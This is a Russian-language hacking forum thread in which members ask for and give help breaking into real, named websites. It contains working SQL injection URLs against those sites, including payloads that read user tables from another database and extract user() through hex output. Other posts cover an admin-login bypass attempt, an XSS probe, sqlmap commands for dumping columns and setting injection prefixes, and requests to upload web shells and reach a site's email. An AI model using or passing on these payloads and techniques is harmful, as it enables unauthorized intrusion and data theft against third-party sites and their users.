Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    В общем есть проблемная скуля
    Code:
    http://www.sevseun.com/downloads.php?page_id=-1075%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+
    На которой видны пинтабельные поля, но получить от них что-либо (нр. version() ) выбивает чистую страницу. Расскажите, что за фигня!
     
  2. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Спасибо ребятулечки, но там другая фигня получилась.
    Code:
    http://www.sevseun.com/downloads.php?page_id=-1075%27+union+select+1,2,3,4,Column_name,6,7,8,9,10,11,12,13,14,15,16+from+information_scheMa.columns+where+table_name=%27users%27+limit+2,1+--+
    вообщем есть столбец username & password, но туда не пускает, мб зарегистрироваться надо. А насчёт скобок тоже отдельное спасибо, но можно поочередно вытянуть используя их.

    II.
    Code:
    http://fmf.npi-tu.ru/index.php?id=3+union+select+1,2,3,4,5,6,7,8,9,10,11+--+
    - не выводит пентабельное поле.
     
    #22962 Unknowhacker, 22 Jan 2014
    Last edited: 23 Jan 2014
  3. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Зачем регистрироватся, если ты работаешь с БД ?
    Table 'sevseun.users' doesn't exist
    Нету прав у юзера на доступ к этой таблице.
     
    _________________________
  4. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Просто у меня были такие случаи на практике, когда после регистрации получалось вытянуть.
     
  5. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Такого быть не может.
     
    _________________________
  6. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    Table 'sevseun.users' doesn't exist
    Таблицы такой нет вообще, а не нет доступа.
     
  7. Evil_Genius

    Evil_Genius Member

    Joined:
    3 Aug 2009
    Messages:
    519
    Likes Received:
    15
    Reputations:
    -4
    Подскажите пожалуйста по вопросу sql inj. Нашел уязвимую админку, хочу создать запрос для проникновения без пароля.

    Есть 2 поля: Логин и Пароль
    <input name="username" tabindex="1" size="25" id="username" type="text">
    <input name="password" tabindex="2" size="25" id="password" type="password">


    В поле username ввожу '1
    В поле password ввожу '2
    На что выдает мне:
    DB Error: syntax error
    SELECT NAME, PASSWORD FROM USER WHERE NAME = ''1' AND state = '0' [nativecode=1064 ** You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1' AND state = '0'' at line 2]


    Далее пробую вставить запрос такого вида в поле username
    admin' or '1'='1' AND password='' or '1'='1'
    На что выдает следующее:
    DB Error: syntax error
    SELECT NAME, PASSWORD FROM USER WHERE NAME = 'admin' or '1'='1' AND password='' or '1'='1'' AND state = '0' [nativecode=1064 ** You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0'' at line 2]


    Как правильно составить запрос?
     
  8. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Возникло парочку вопросов:

    1.
    Code:
    http://www.nova-plosha.com/index.php?hl=ru&idd=cat&cat=13955%27
    - невозможно подобрать кол-во столбцов.
    2. Есть место для заливки шелла, но когда заливаешь неизвестно где он пропадает..
    Code:
    http://kerch.biz/upload/
    в категории archive; photos - не обнаружено.
    3.
    Code:
    http://www.auto-alliance.org/item.php?id=6319+And+1=-0+union+select+version%28%29+--+
    - не выводится пентабельное поле.
    4.
    Code:
    http://fmf.npi-tu.ru/index.php?id=3+union+select+1,2,3,4,5,6,7,8,9,10,1  1+--+
    - аналогично, не выводится пентабельное поле.
     
    #22968 Unknowhacker, 23 Jan 2014
    Last edited: 23 Jan 2014
  9. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Таблица есть. Из нее вытаскивались колонки.
     
    _________________________
  10. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    lolwut?
    Почему ты утверждаешь, что к таблице нету доступа, когда ошибка говорит об отсутствии таблицы как таковой? MySQL шутник тот еще, шутки шутит, ага.

    Таблица находится в другой БД, хакер.
    Code:
    http://www.sevseun.com/downloads.php?page_id=1075%27+and+0+union+select+1,2,3,4,[B]TABLE_SCHEMA[/B],6,7,8,9,10,11,12,13,14,15,16+from+information_scheMa.columns+where+table_name=%27users%27+limit+0,1--%20a
    -- aukro

    Code:
    http://www.sevseun.com/downloads.php?page_id=1075%27+and+0+union+select+1,2,3,4,username,6,7,8,9,10,11,12,13,14,15,16+from+[B]aukro.users[/B]--%20a
    ...
    Звучит крайне прохладно.

    Unknowhacker, что такое "пентабельное поле"? Я могу понять не выговаривать букву "р", но не иметь возможности ее написать это что-то новенькое.

    И по поводу http://www.auto-alliance.org/item.php?id=6319+And+1=-0+union+select+version%28%29+--+
    Вывод там есть, в ошибке, что ниже. Но на вывод возможны только числовые значения, так еще и определенной длины.
    Объяснять более подробно, что там происходит просто впадлу, да и бессмысленно =\
    Code:
    http://www.auto-alliance.org/item.php?id=6319%20and(0)%20UNION%20SELECT%20hex(mid(user(),[B]1[/B],2))--%20a
    http://www.auto-alliance.org/item.php?id=6319%20and(0)%20UNION%20SELECT%20hex(mid(user(),[B]3[/B],2))--%20a
    http://www.auto-alliance.org/item.php?id=6319%20and(0)%20UNION%20SELECT%20hex(mid(user(),[B]5[/B],2))--%20a
    http://www.auto-alliance.org/item.php?id=6319%20and(0)%20UNION%20SELECT%20hex(mid(user(),[B]7[/B],2))--%20a
    Инкриминируем это число на 2, пока не будет нуля и полученные значения записываем (полученные значения будут выводится тут Error loading image: /image2.php?id=[NUM]), потом полученный результат анхексаем и получаем заветные данные.
     
    #22970 Tigger, 23 Jan 2014
    Last edited: 23 Jan 2014
  11. nike001

    nike001 New Member

    Joined:
    19 Jan 2014
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    Доброго времени суток. Есть сайт вида www.site.com/find.jsp?f= попробовал подставить
    Code:
    "><script>alert('xss')</script>
    в исходнике
    Code:
    <input type="text" name="f" value=""><script>alert('xss')</script>"/> 
    тег не закрылся. Тогда сделал так
    Code:
     "><script>alert('xss')</script><input type="text" name="f" value="
    . Скрипт нормально вставился и не фильтровался
    Code:
    <input type="text" name="f" value=""><script>alert('xss')</script><input type="text" name="f" value=""/>
    , но заветного окошка я так и не увидел, что не так?
     
  12. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Браузер
     
    _________________________
  13. nike001

    nike001 New Member

    Joined:
    19 Jan 2014
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    Всмысле браузер? В настройках Javascript включён.
     
  14. K800

    K800 Nobody's Fool

    Joined:
    25 Dec 2010
    Messages:
    2,190
    Likes Received:
    3,825
    Reputations:
    372
    nike001,
    http://forum.antichat.net/showthread.php?t=20140

     
  15. erwap

    erwap Member

    Joined:
    20 Sep 2012
    Messages:
    56
    Likes Received:
    16
    Reputations:
    0
    Подскажите по sqlmap.
    Задача: сдампить определенные колонки в таблице
    Code:
    python sqlmap.py -u http://site.ru?a=inject --dump -D db_name -T table_name -C column1
    В вышеприведенном коде сдампится column1 , а мне нужно еще column2. Как синтаксически правильно дописать вторую колонку?
     
  16. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    erwap
    -C "column1,column2,column3"
     
    1 person likes this.
  17. 2fed

    2fed Member

    Joined:
    26 Mar 2008
    Messages:
    44
    Likes Received:
    9
    Reputations:
    0
    1) http://armtoday.info/Lang=_Ru&mode=allwords&search=%Inject_Here%&SectionID=-1&submit=%d5%88%d6%80%d5%b8%d5%b6%d5%a5%d5%ac

    не как не смог сглмапом так же Хавижом( в чем проблема не пойму(


    2) aztexnika.az/upload.php
    aztexnika.az/admin/upload.php

    нужно залить шелл. нужен доступ емаилу с этого сайта(
     
    #22977 2fed, 25 Jan 2014
    Last edited: 25 Jan 2014
  18. BigBanMan

    BigBanMan New Member

    Joined:
    13 Apr 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Есть уязвимость. SQLi
    Предположим так (заменил дабы не палить):
    Url: http://www.site.com/threadrate.php?t=104496
    Method: post
    Param: securitytoken
    Payload: "));SELECT+SLEEP(15)/*
    Data: securitytoken=guest&t=104496&pp=10&page=1&vote=5

    как верно составить запрос sqlmap с payload'ом чтоб было? Нигде в инете ни в документах не найти как сделать свой payload.
    А без него уязвимость не видит. Прошу, помогите
     
  19. Zed0x

    Zed0x Member

    Joined:
    4 Jun 2012
    Messages:
    114
    Likes Received:
    29
    Reputations:
    23
    Прежде чем говорить - проверьте.
    HTML:
    sqlmap --help
    За payload отвечает две опции:
    --prefix=PREFIX Injection payload prefix string
    --suffix=SUFFIX Injection payload suffix string

    соответственно Ваш запрос будет примерно таким:
    PHP:
    sqlmap --url="http://www.site.com/threadrate.php?t=104496" --data="securitytoken=guest*&t=104496&pp=10&page=1&vote=5" --prefix="));" --dbms="MySQL"
     
  20. BigBanMan

    BigBanMan New Member

    Joined:
    13 Apr 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0

    Для начала спасибо вам, попробую.
    А так я и вправду видел это, но как это применять в команде не понимал. Тоесть если у меня:
    Payload: '"%2bSLEEP(15)--
    то команда будет включать
    Code:
    --prefix=""%2b"
    ?
     
    #22980 BigBanMan, 25 Jan 2014
    Last edited: 25 Jan 2014
Thread Status:
Not open for further replies.